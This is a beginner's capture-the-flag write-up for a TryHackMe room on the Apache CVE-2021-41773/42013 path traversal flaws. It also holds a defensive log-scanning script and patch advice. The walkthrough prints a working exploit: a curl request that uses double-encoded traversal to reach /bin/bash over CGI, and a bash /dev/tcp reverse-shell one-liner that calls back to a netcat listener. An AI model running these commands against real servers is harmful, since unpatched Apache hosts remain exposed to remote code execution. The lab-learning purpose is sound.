CVE-2021-41773/42013 THM Write-up [Task-4]

Vineeth Bharadwaj P
4 min read, Oct 24, 2021

This is a short write-up, aimed at beginners, of task 4 of the www.tryhackme.com box on CVE-2021-41773 and CVE-2021-42013, the infamous Apache HTTP Server path traversal vulnerabilities.
You can access and try the box here: https://tryhackme.com/room/cve202141773

This is an informational box, where you mainly learn about the above-mentioned CVEs and their impact, and the author of the box, hydragyrum, has done an excellent job of explaining them.

While tasks 1 to 3 are quite straightforward and can be done by reading the info text thoroughly (maybe with some help from online tools for encoding the text), task 4 is the practical exam. For a beginner who might need help getting a reverse shell with netcat, this is a simple write-up showing how to do it.

Note: the box will take around 5 to 7 minutes to come up.

Let’s first verify that everything is working fine:

curl http://<thm_ip>:8080

A response from the server confirms that the box is up and everything is working.

Let's move on to solving the questions of task 4, following almost the same commands shown in task 3.

Note: don't forget to replace the IP address and port with those of your machine as shown on THM.

Port 8080 has Apache 2.4.49 without CGI.

Port 8081 has Apache 2.4.49 with CGI.

Port 8082 has Apache 2.4.50 without CGI. Hence we need double encoding here, as explained in task 3.

Port 8083 has Apache 2.4.50 with CGI. This part is not shown in task 3 as of the time of writing this article, but if you have understood and done the above three, this one is no different: you just need to double-encode the path you want to traverse.
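The two encodings that the four ports exercise are also exactly what a defender looks for in httpd access logs. The script below is an added example, not part of the original write-up or of the box: it parses common-log-format lines, percent-decodes each request path repeatedly, counts how many decoding rounds were needed before a `..` segment appears (one for the `.%2e` form used against 2.4.49, two for the `.%%32%65` form used against 2.4.50), and reports the hits. The log lines are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines in Apache's common log format.
# They are made up for this example, not taken from the box or a real server.
SAMPLE_LOG = """\
10.0.0.5 - - [24/Oct/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 1234
10.0.0.9 - - [24/Oct/2021:10:00:02 +0000] "GET /cgi-bin/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1" 200 2048
10.0.0.9 - - [24/Oct/2021:10:00:03 +0000] "POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1" 200 512
10.0.0.7 - - [24/Oct/2021:10:00:04 +0000] "GET /images/../images/logo.png HTTP/1.1" 200 4096
"""

# Minimal common-log-format parser: client IP, method, request path, status code.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')


def decode_rounds(path, max_rounds=3):
    """Percent-decode `path` repeatedly until it stops changing.

    Returns (decoded_path, rounds). One round turns `.%2e` into `..`
    (the 2.4.49 case); `.%%32%65` needs two rounds, because the first
    round only yields `.%2e` (the 2.4.50 double-encoding case).
    """
    current, rounds = path, 0
    while rounds < max_rounds:
        decoded = unquote(current)
        if decoded == current:
            break
        current, rounds = decoded, rounds + 1
    return current, rounds


def has_dotdot_segment(path):
    """True if any '/'-separated segment of the path is exactly '..'."""
    return any(segment == ".." for segment in path.split("/"))


def scan_log(text):
    """Return one finding per request whose decoded path contains a '..' segment.

    rounds > 0 means the dots were percent-encoded in the raw request, which is
    the signature of CVE-2021-41773 (one round) and CVE-2021-42013 (two rounds).
    A literal '..' (rounds == 0) is normalised away by httpd and is kept only as
    low-value context.
    """
    findings = []
    for line in text.strip().splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue  # skip lines that are not in common log format
        ip, method, raw_path, status = match.groups()
        decoded, rounds = decode_rounds(raw_path)
        if has_dotdot_segment(decoded):
            findings.append({
                "ip": ip,
                "method": method,
                "status": int(status),
                "raw_path": raw_path,
                "decoded_path": decoded,
                "rounds": rounds,
                "encoded": rounds > 0,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        kind = "ENCODED traversal" if f["encoded"] else "literal '..'"
        print(f"{f['ip']:<10} {f['method']:<5} rounds={f['rounds']} {kind}: "
              f"{f['raw_path']} -> {f['decoded_path']}")
```

A request path that only becomes `..` after one or more decoding rounds is the signal worth alerting on; the plain `..` hit is there to show the difference. On the mitigation side, both CVEs are fixed in Apache httpd 2.4.51, and on a build that cannot be upgraded yet, denying access to the filesystem root (`Require all denied` in the `<Directory />` block) stops the traversal from reaching files outside the document root; the "with CGI" ports on the box are what turn a file read into code execution.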

Getting a reverse-shell:

We will use netcat for this. On your own machine (the one that will receive the connection; the placeholders below call it the target machine), start a netcat listener:

nc -lv <port>

Note: you might need to run this with sudo, depending on how your computer is configured.

The hint on the question leads to https://www.revshells.com. I personally prefer the cheatsheet from pentestmonkey. However, for this task it really doesn't matter; we just need a simple bash command to get a reverse shell:

bash -i >& /dev/tcp/<target_machine_ip>/<target_machine_port> 0>&1

We replace the target machine IP and port with the IP address of the machine running the listener and the port netcat is listening on.

Then we run the following command in a new window:

curl -v 'http://<thm_ip>:8083/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash' -d 'echo; bash -i >& /dev/tcp/<target_machine_ip>/<target_machine_port> 0>&1'

If you have done everything right, curl's verbose output will show the request going through, and the netcat session in the other terminal should now have a reverse shell.

This should already give you the answer to the next question. You can also run the whoami command to get the answer.

Getting root flag:

This is the part which I found a little strange. Normally we would be expected to find a way to escalate our privileges. However, the hint to the question already gives us the password for the root user. So I suppose this task is mainly to verify again that you indeed have achieved a reverse shell? (Remember, this is an informational box.)

If I find a way to escalate the privileges to root without using the password-hint, I will update this article.

Anyway, for now, the task is quite simple: change to the root user using the password hint and get the root.txt flag.

With this, we finish task 4 :)

I hope this write-up helps beginners making their way into this field, or anyone who is curious about the Apache CVE-2021-41773/42013 vulnerabilities.


Vineeth Bharadwaj P

Automotive/I.T Security. Artist. Photographer. Germany/India